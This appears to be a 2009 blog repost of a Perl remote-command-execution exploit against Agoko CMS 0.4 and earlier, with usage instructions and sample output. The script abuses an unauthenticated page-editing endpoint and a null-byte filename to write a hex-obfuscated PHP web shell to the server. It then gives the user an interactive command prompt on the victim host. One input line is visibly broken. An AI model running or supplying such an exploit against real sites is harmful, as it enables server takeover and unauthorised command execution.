Saturday, September 12, 2009

Agoko CMS <= 0.4 remote commands execution exploit

#!/usr/bin/perl

print q~
--------------------------------------------------
Agoko CMS <= 0.4 remote commands execution exploit
by staker
mail: staker[at]hotmail[dot]it
--------------------------------------------------

[*] Usage -> perl [xpl.pl] [host] [path]
[*] Example -> perl agk.pl localhost /Agoko

~;


#>-----------<#
#>- Working -<#
#>-----------<#########################################
# staker[death]:~/Desktop$ perl a.pl 127.0.0.1 /agoko #
# #
# -------------------------------------------------- #
# Agoko CMS <= 0.4 remote commands execution exploit #
# by staker #
# mail: staker[at]hotmail[dot]it #
# -------------------------------------------------- #
# #
# [*] Usage -> perl [xpl.pl] [host] [path] #
# [*] Example -> perl agk.pl localhost /Agoko #
# #
# shell already exists. #
# #
# Agoko[shell]:~$ uname -n -r #
# #
# death 2.6.27-7-generic #
#######################################################


use IO::Socket;
use LWP::Simple;


my $host = shift;
my $path = shift || exit(0);


check_shell($host,$path);


sub check_shell() {
my $host = $_[0];
my $path = $_[1] || die $!;

my $packet = "GET /$path/content/shell_vup.php HTTP/1.1\r\n".
"Host: $host\r\n".
"Cookie: bany=love_me\r\n".
"User-Agent: Lynx (textmode)\r\n".
"Connection: close\r\n\r\n";

if (give_kt($host,$packet) =~ /bany wtf/i) {
print "[*] shell already exists.\n";
load_cmd($host,$path);
}
else {
print "[*] exploiting..\n";
inject_shell($host,$path);
}
}


sub inject_shell() {
my ($host,$path) = @_;

my $shell = "\x3C\x3F\x70\x68\x70\x20\x20\x20\x20\x20\x20\x65\x72\x72".
"\x6F\x72\x5F\x72\x65\x70\x6F\x72\x74\x69\x6E\x67\x28\x45".
"\x5F\x41\x4C\x4C\x29\x3B\x20\x20\x20\x20\x20\x20\x20\x20".
"\x20\x20\x20\x20\x69\x66\x20\x28\x69\x73\x73\x65\x74\x28".
"\x24\x5F\x47\x45\x54\x5B\x27\x63\x6D\x64\x27\x5D\x29\x29".
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x61\x73\x73".
"\x74\x68\x72\x75\x28\x73\x74\x72\x69\x70\x73\x6C\x61\x73".
"\x68\x65\x73\x28\x24\x5F\x47\x45\x54\x5B\x27\x63\x6D\x64".
"\x27\x5D\x29\x29\x3B\x20\x20\x20\x20\x20\x20\x65\x6C\x73".
"\x65\x20\x20\x20\x20\x20\x20\x20\x20\x20\x64\x69\x65\x28".
"\x22\x62\x61\x6E\x79\x20\x77\x74\x66\x22\x29\x3B\x20\x20".
"\x20\x20\x20\x20\x3F\x3E\x20";


my $data = "filename=shell_vup.php\x00&text=$shell&Submit=Speichern";

my $packet = "POST /$path/admintools/editpage-2.php HTTP/1.1\r\n".
"Host: $host\r\n".
"User-Agent: Mozilla/4.5 [en] (Win95; U)\r\n".
"Cookie: bany=love_me\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Content-Length: ".length($data)."\r\n".
"Connection: close\r\n\r\n".
$data;

if (give_kt($host,$packet) =~ /erfolgreich eingetragen/i)
{
load_cmd($host,$path)
}
else
{
die "[*] Exploit failed.\n";
}

}


sub load_cmd() {
my $host = $_[0];
my $path = $_[1];

while (1)
{
print "\nAgoko[shell]:~\$ ";
chomp (my $cmd = );

exit(0) if $cmd =~ /^(exit|quit|out)+$/i;

getprint("http://$host/$path/content/shell_vup.php?cmd=$cmd");
}
}


sub give_kt() {
my $input = $_[0];
my $heads = $_[1] || die $!;

my $result;
my $socket = IO::Socket::INET->new(
PeerAddr => $input,
PeerPort => 80,
Proto => 'tcp'
) || die $!;

$socket->send($heads);

while (<$socket>) { $result .= $_; }

return $result;
}

Twitter Delicious Facebook Digg Stumbleupon Favorites More